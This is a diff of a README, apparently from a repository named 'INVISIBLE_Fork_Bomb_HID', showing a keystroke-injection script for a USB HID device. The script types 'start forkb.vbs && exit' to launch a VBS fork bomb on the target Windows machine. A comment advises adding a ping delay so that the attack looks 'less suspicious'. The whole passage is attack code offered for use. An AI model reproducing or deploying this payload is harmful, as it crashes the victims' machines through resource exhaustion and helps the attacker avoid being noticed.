125K/INVISIBLE_Fork_Bomb_HID/README.md

 CTRL z
 ENTER
 DELAY 50
-REM STRING ping localhost -n 10
+STRING start forkb.vbs && exit
-REM You can uncomment this ^ to delay 10 seconds before starting the fork bomb.
-(By this way it's less suspicious) STRING start forkb.vbs
+REM You can add this: ">null ping localhost -n 5 && " before "start" to make a (5 sec) delay before the vbs execution.
+(By this way it's less suspicious)
 ENTER
 </pre></code>